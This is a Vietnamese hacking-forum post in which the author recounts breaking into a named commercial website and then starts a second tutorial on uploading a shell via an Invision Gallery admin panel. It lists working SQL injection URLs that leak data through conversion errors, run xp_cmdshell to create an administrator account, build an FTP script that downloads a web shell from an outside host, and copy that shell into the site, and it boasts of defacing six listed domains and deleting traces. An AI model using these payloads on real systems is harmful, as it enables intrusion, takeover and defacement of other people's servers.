http://www.giftfulfillment.com/Prod.asp?id=290' Hực, dek "trúng xổ số" gồi , mừ lại đang cáu cái vụ nhìn nhầm đồng hồ đi học muộn 1 tiết, coi xem có zô đc hok or d3face cho bõ tức... Ta
Trang 1http://www.giftfulfillment.com/Prod.asp?id=290'
Hực, dek "trúng xổ số" gồi , mừ lại đang cáu cái vụ nhìn nhầm đồng hồ đi học muộn 1 tiết, coi xem có zô đc hok or d3face cho bõ tức
Convert fát xem user:
Code:
http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,system _user) sp_password
Hek, SA
~~> nghĩ ngay tới việc Add User & Remote nếu như thuận lợi
Đầu tiên là lệnh add U/P kh0c_tham/123456 zô:
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;exec%20master xp_cmdshell%2 0'net%20user%20kh0c_tham%20123456%20/add' sp_password
Sau đó đưa kh0c_tham zô Admin group:
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;exec%20master xp_cmdshell%2 0'net%20localgroup%20administrators%20kh0c_tham%20/add' sp_password
Test thử xem add đc chưa fát nào:
Đổ kq của cmd net user vào table hcrk
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;drop%20table%20hcrk%20create
%20table%20hcrk%20(id%20int%20identity,nd%20varchar(1000))%20insert%20i nto%20hcrk%20exec%20master xp_cmdshell%20'net%20user' sp_password Sau đó convert ra show hàng thoai
Code:
http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,(select
%20top%201%20nd%20from%20hcrk%20where%20nd%20like%20('%25kh0c_t ham%25'))) sp_password
Ok, add thành công gồi
Trích:
Syntax error converting the varchar value 'IUSR_6PY6L61 IWAM_6PY6L61 kh0c_tham ' to a column of data type int
Trang 2H check ip coi sao, lại đổ kq ra thoai
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;drop%20table%20hcrk%20create
%20table%20hcrk%20(id%20int%20identity,nd%20varchar(1000))%20insert%20i nto%20hcrk%20exec%20master xp_cmdshell%20'ipconfig' sp_password
Rùi convert thì được
Code:
http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,(select
%20top%201%20nd%20from%20hcrk%20where%20nd%20like%20('%25Ip%20a ddress%25'))) sp_password
Trích:
Syntax error converting the varchar value ' IP Address : 10.1.0.2 '
Hức, nhìn cái IP tới đây thấy nản
H upload backdoor lên đã:
Backdoor e chuẩn bị trên 1 free host
Ok, tiếp tục nào Ta sẽ chuẩn bị một kịch bản up file thông qua ftp tên là f.txt có nội dung như sau:
Trích:
open ftp.7host.com>>f.txt
user kh0ctham xxxxx>>f.txt
ascii>>f.txt
get 6in1.asp>>f.txt
quit>>f.txt
H làm kịch bản này thui^^
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'echo open ftp.7host.com>>f.txt'; sp_password
http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'echo user kh0ctham xxxxx>>f.txt'; sp_password
Cứ thế chạy cho đến hết kịch bản
Xong rồi chạy lệnh ftp -v -i -n -s:f.txt để thực thi quá trình ftp
Code:
Trang 3http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'ftp v
-i -n -s:f.txt'; sp_password
Waiting, chạy xong rồi, thế là đã có con shell trên server, h nó đang ở
C:\Windows\system32
H ta fải tìm path của site kia để copy nó sang thì mới d3face đc chớ
Quá trình tìm path của mình cũng tương tự như trên, đầu tiên run lệnh dir sau đó
đổ kq vào file or tạo table mới Nếu đổ ra file thì lại dùng ftp put ngược trở lại host của mình và vào view, còn nếu đổ ra table thì lại convert như khi tìm ip
Ở đây mình chọn cách đổ ra file Done, mình đã tìm được path của site kia trên server
H copy cái con shell kia qua thôi
Code:
http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'copy 6in1.asp xxxxxxxxxx'; sp_password
Gồi, shell xong gồi, h đi dạo 1 vòng "local" và up file d3face.asp lên để kỷ niệm các em thôi
Việc up file này cũng làm y hệt như up shell thôi, ở đây mình hok del cái gì cả, cũng ko chơi index, chỉ gọi là để lại kỷ niệm
Trích:
http://www.mrts.net/d3fault.asp
http://www.nsdinc.net/d3fault.asp
http://www.giftfulfillment.com/d3fault.asp
http://www.lowrespiratory.com/d3fault.asp
http://www.jasonjkim.com/d3fault.asp
http://www.surgecomponents.com/d3fault.asp
Làm xong del hết mý cái file như là f.txt và 6in1.asp ở C:\Windows\system32 Còn chỗ log hẻm biêt ở đâu<fake ip rùi^_^>
Trang 4G4m3 0ver!!
P/S:Bro nào viết cái tut cho niu bi ai bọn e về cái vụ Remote cái
Trang 5kh0c_tham(HCE)
How I Up shell lên www.meteorwebdesign.net qua Invision Gallery
Hôm nay xin trình bày anh em cách tôi Up shell lên Host qua Invision Gallery sau khi đã vào đc ACP Đó cũng là cách mà lần trc tôi đã Up shell và Deface thằng www.meteorwebdesign.net ( >
https://hcegroup.biz/forums/showthread.php?t=706) , cách up chẳng giống ai
Sau khi đăng nhập vào ACP với pass của Admin , ta ấn vào mục Componels , vì Invision Gallery là 1 Componel của IBP nên mọi Setting của nó sẽ nằm trong đây [Hình]
Trong Componels chọn Tools , Gallery Tools hiện ra ta vào tiếp from Zip file [Hình]